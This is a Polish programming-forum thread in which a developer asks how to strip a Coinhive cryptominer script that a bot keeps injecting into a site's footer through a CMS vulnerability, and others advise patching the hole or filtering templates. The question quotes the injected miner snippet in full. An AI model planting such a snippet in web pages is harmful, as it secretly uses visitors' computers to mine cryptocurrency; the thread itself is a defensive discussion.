• Najnowsze pytania
  • Bez odpowiedzi
  • Zadaj pytanie
  • Kategorie
  • Tagi
  • Zdobyte punkty
  • Ekipa ninja
  • IRC
  • FAQ
  • Regulamin
  • Książki warte uwagi

Blokowanie skryptu Coinhive.com po stronie serwera

Object Storage Arubacloud
0 głosów
218 wizyt
pytanie zadane 7 grudnia 2017 w Bezpieczeństwo, hacking przez Sisa Bywalec (2,580 p.)

Hej,

Dostałem do napisania skrypt, który ma wyszukiwać linijkę z kodem do koparki i ją usuwać. Operacja ma się odbywać po stronie serwera. Strona ma autorski, ale w jednym miejscu dziurawy CMS, przez tą dziurę właśnie wrzucany jest rozszerzany plik np. stopki o wartość z kodem JS (problem z tym, że data modyfikacji pliku się nie zmienia, zmienia się tylko rozmiar pliku - przypuszczam, że to jest bot, bo za każdym razem jak usunę tą linijkę jest dopisywana gdzieś indziej zero w tym zależności, przez FTP też się nie łączy bo w logach jest pusto) .

<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('wALyjE7Fpru44rvyf51ON7lZbRuPFNj2');
miner.start();
</script>

Pytanie brzmi jak do tego podejść? Puścić skrypt, który wyszuka i usunie dopisany kod, czy lepiej dołączyć plik JSa, który wykryje że jest uruchamiany Minner i go zablokuje?

1 odpowiedź

0 głosów
odpowiedź 7 grudnia 2017 przez Comandeer Guru (600,330 p.)
Jedynym sensownym rozwiązaniem w tym wypadku jest usunięcie luki a nie robienie takich kombinacji alpejskich.
komentarz 7 grudnia 2017 przez Sisa Bywalec (2,580 p.)
Chodzi o to, że strona będzie pisana na nowo (bo nowe strony są już odporne na te ataki), więc dostałem do napisania skrypt który tymczasowo się tym zajmie do czasu pojawienia się nowej wersji strony.
1
komentarz 7 grudnia 2017 przez Comandeer Guru (600,330 p.)

Jeśli strona ma jakiś system szablonów, to można obrobić szablon przed wyświetleniem np. przy pomocy DOMDocument i wyciąć rzeczy, których nie chcemy.

Podobne pytania

0 głosów
0 odpowiedzi 99 wizyt
pytanie zadane 19 września 2016 w JavaScript przez redstar1 Bywalec (2,200 p.)
–1 głos
2 odpowiedzi 896 wizyt
pytanie zadane 16 kwietnia 2016 w PHP przez niezalogowany
0 głosów
0 odpowiedzi 513 wizyt

92,536 zapytań

141,376 odpowiedzi

319,449 komentarzy

61,920 pasjonatów

Motyw:

Akcja Pajacyk

Pajacyk od wielu lat dożywia dzieci. Pomóż klikając w zielony brzuszek na stronie. Dziękujemy! ♡

Oto polecana książka warta uwagi.
Pełną listę książek znajdziesz tutaj.

Akademia Sekuraka

Kolejna edycja największej imprezy hakerskiej w Polsce, czyli Mega Sekurak Hacking Party odbędzie się już 20 maja 2024r. Z tej okazji mamy dla Was kod: pasjamshp - jeżeli wpiszecie go w koszyku, to wówczas otrzymacie 40% zniżki na bilet w wersji standard!

Więcej informacji na temat imprezy znajdziecie tutaj. Dziękujemy ekipie Sekuraka za taką fajną zniżkę dla wszystkich Pasjonatów!

Akademia Sekuraka

Niedawno wystartował dodruk tej świetnej, rozchwytywanej książki (około 940 stron). Mamy dla Was kod: pasja (wpiszcie go w koszyku), dzięki któremu otrzymujemy 10% zniżki - dziękujemy zaprzyjaźnionej ekipie Sekuraka za taki bonus dla Pasjonatów! Książka to pierwszy tom z serii o ITsec, który łagodnie wprowadzi w świat bezpieczeństwa IT każdą osobę - warto, polecamy!

...